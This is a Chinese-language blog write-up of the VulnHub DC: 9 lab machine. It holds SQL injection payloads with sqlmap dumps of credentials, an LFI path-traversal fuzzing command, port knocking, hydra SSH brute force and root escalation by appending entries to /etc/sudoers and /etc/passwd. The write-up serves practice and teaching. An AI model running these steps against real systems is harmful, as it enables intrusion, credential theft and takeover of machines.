[資訊安全] VulnHub – DC: 9 Write-up

MksYi VulnHub, 滲透測試, 資訊安全
Photo by Someus Christopher on Unsplash

DC 系列第九題, DC: 9 終於在年假結束的第二個禮拜全數解題完畢,雖然比預期晚了兩個禮拜,但…至少還是有兌現當時後開的支票,之後若有空應該還是會持續找靶機來練習,若自信允許的話,應該會也會抽空嘗試 OSCP 吧。

環境設定

VirtualBox: Kali & DC: 9
Net Config: NAT Network

尋找靶機

$ nmap 10.0.2.1/24 -sP                                                            
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 10:09 CST
Nmap scan report for 10.0.2.1
Host is up (0.013s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0052s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00025s latency).
Nmap scan report for 10.0.2.20
Host is up (0.0021s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 13.71 seconds

$ nmap 10.0.2.20 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-20 10:51 CST
Nmap scan report for 10.0.2.20
Host is up (0.0011s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds

解題過程

由於只有開 80 Port,就連上去看看,並且發現是一個簡單的網站。

Wappalyzer

透過 Wappalyzer 並沒有什麼發現。

SQL Injection

透過 Search 功能找到 SQL Injection 的注入點。

SQLMAP

發現資料庫 usersUserDetails 資料表中,含有許多帳號密碼,並且密碼並未加密。

$ sqlmap -r dc9_payload.txt --dbs -D users -T UserDetails --dump   
        ___
       __H__ 
 ___ ___[)]_____ ___ ___  {1.4.11#stable} 
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:57:24 /2021-02-20/

[10:57:24] [INFO] parsing HTTP request from 'dc9_payload.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 
[10:57:25] [INFO] resuming back-end DBMS 'mysql' 
[10:57:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=' AND (SELECT 3088 FROM (SELECT(SLEEP(5)))pxVA) AND 'capG'='capG

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6a6d6f4f554e42795855646c72447963637579574e4754724a736d6b4d5a5377684c70664752586f,0x716a786a71),NULL,NULL,NULL,NULL-- -
---
[10:57:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:57:25] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[10:57:26] [INFO] fetching columns for table 'UserDetails' in database 'users'
[10:57:26] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

接著再找 Staff 資料庫的 Users 資料表,發現一組 admin 的帳號與密碼 Hash。

$ sqlmap -r dc9_payload.txt --dbs -D Staff -T Users --dump   
        ___
       __H__                                  
 ___ ___[.]_____ ___ ___  {1.4.11#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:33:40 /2021-02-21/

[13:33:40] [INFO] parsing HTTP request from 'dc9_payload.txt'
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] 
[13:33:42] [INFO] resuming back-end DBMS 'mysql' 
[13:33:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=' AND (SELECT 3088 FROM (SELECT(SLEEP(5)))pxVA) AND 'capG'='capG

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6a6d6f4f554e42795855646c72447963637579574e4754724a736d6b4d5a5377684c70664752586f,0x716a786a71),NULL,NULL,NULL,NULL-- -
---
[13:33:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[13:33:42] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[13:33:42] [INFO] fetching columns for table 'Users' in database 'Staff'
[13:33:42] [INFO] fetching entries for table 'Users' in database 'Staff'
[13:33:42] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[13:33:43] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[13:33:44] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] 
[13:33:45] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[13:33:45] [INFO] starting 2 processes 
[13:34:47] [WARNING] no clear password(s) found                        
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

[13:34:47] [INFO] table 'Staff.Users' dumped to CSV file '/home/mksyi/.local/share/sqlmap/output/10.0.2.20/dump/Staff/Users.csv'
[13:34:47] [INFO] fetched data logged to text files under '/home/mksyi/.local/share/sqlmap/output/10.0.2.20'

Login

首先嘗試使用 users 資料庫裡面的使用者帳密進行登入,試了幾組後都無法成功,轉為使用 Staff 資料表,但密碼經過 HASH,透過線上工具 crackstation 解出密碼為 transorbital1。

嘗試用 admin/transorbital1 登入成功後,發現底部有個 File does not exist 字樣,這個有點像是 DC: 5 的 footer 一樣是參數 file 的位置可被 LFI。

但可以 LFI,卻沒有地方可以寫入檔案,必且也沒有 phpinfo 可以利用,不知道該如何 RCE,最後用 Burp 爆一下目錄。

wfuzz -c -z file,linux_list.txt --hw 78 -u http://10.0.2.20/welcome.php?file=../../../../../../..FUZZ -b PHPSESSID=9grc9ljpq4n37bvr0n012p37in

但還是沒有得到可以利用的資訊,這邊折騰了幾天,最後決定看偷看一下別人的 Write-up,其他人發現了 /etc/knockd.conf 的檔案,到這邊才初步認識到 Single Packet Authorization (SPA) 這個概念。

先用防火牆預設把所有的 ports (或至少重要的 ports, 例如 22) 通通封掉, 這就像是在門鎖之外再蓋上一層 沒有鎖頭、 沒有鑰匙孔的門 一樣。 然後跟客戶端約好按照某個特定順序敲幾個 ports (例如先敲 23815、 次敲 62408、 再敲 59174) 伺服器偵測到這個特定順序, 外門才會像芝麻開門一樣地短暫打開一兩分鐘, 這時才看得見鑰匙孔 (port 22, ssh)。

連鑰匙孔都藏起來的 ssh 完全防禦: SPA

檢視 /etc/knockd.conf 設定檔內容後可以看到,ssh 的開啟條件為 7469、8475、9842。

但這邊還有一個問題,就算可以登入,也沒有帳號密碼,於是想到前面從資料庫偷到的明文帳號密碼組來嘗試。

marym/3kfs86sfd
julied/468sfdfsd2
fredf/4sfd87sfd1
barneyr/RocksOff
tomc/TC&TheBoyz
jerrym/B8m#48sd
wilmaf/Pebbles
bettyr/BamBam01
chandlerb/UrAG0D!
joeyt/Passw0rd
rachelg/yN72#dsd
rossg/ILoveRachel
monicag/3248dsds7s
phoebeb/smellycats
scoots/YR3BVxxxw87
janitor/Ilovepeepee
janitor2/Hawaii-Five-0

分別存成 dc9_user.txt 與 dc9_pass.txt 後,使用 hydra 進行爆破,然後記得先按規則敲一下目標。

$ for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x 10.0.2.20; done
$ hydra -L dc9_user.txt -P dc9_pass.txt ssh://10.0.2.20

爆破獲取得三組帳號密碼。

[22][ssh] host: 10.0.2.20   login: chandlerb   password: UrAG0D!
[22][ssh] host: 10.0.2.20   login: joeyt   password: Passw0rd
[22][ssh] host: 10.0.2.20   login: janitor   password: Ilovepeepee

Get Root to Win

現在可以透過 SSH 進行登入了,簡單探勘,三組用戶都沒有被加入 sudoers 裡,同時也沒有 gcc,但發現使用者 janitor 的路徑底下有 passwords-found-on-post-it-notes.txt 檔。

$ ssh [email protected]
$ cat /home/janitor/.secrets-for-putin/passwords-found-on-post-it-notes.txt

把他加入到密碼表之後,在爆一次,多爆出了一組用戶。

[22][ssh] host: 10.0.2.20   login: fredf   password: B4-Tru3-001

嘗試登入 fredf,並嘗試獲得更多資訊。

ssh [email protected]
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

發現可以使用 test 這隻程式。

fredf@dc-9:/opt/devstuff/dist/test$ ./opt/devstuff/dist/test/test 
Usage: python test.py read append

根據 Usage 的意思看來,可能是讀取 read 的檔案內容,並 append 在 append 檔案的末端,隨後經實驗證實也是如此。

藉此可以用來新增使用者或改寫檔案,例如新增 sudoers,或直接透過 /etc/passwd 新增一個等 root 使用者。

修改 sudoers:

echo -en "fredf ALL=(ALL:ALL) ALL" > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/sudoers

新增使用者:

$ openssl passwd -1 -salt hacker 123456
$1$hacker$6luIRwdGpBvXdP.GMwcZp/

echo -en "mksyi:$1$hacker$6luIRwdGpBvXdP.GMwcZp/:0:0::/root:/bin/bash" > payload.txt
sudo /opt/devstuff/dist/test/test payload.txt /etc/passwd

Get Root

sudo su
[sudo] password for fredf: 
root@dc-9:/tmp# 
root@dc-9:~# cat theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝

Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

MksYi

透過網路分享知識的學習者。

發佈留言

發佈留言必須填寫的電子郵件地址不會公開。 必填欄位標示為 *

這個網站採用 Akismet 服務減少垃圾留言。進一步了解 Akismet 如何處理網站訪客的留言資料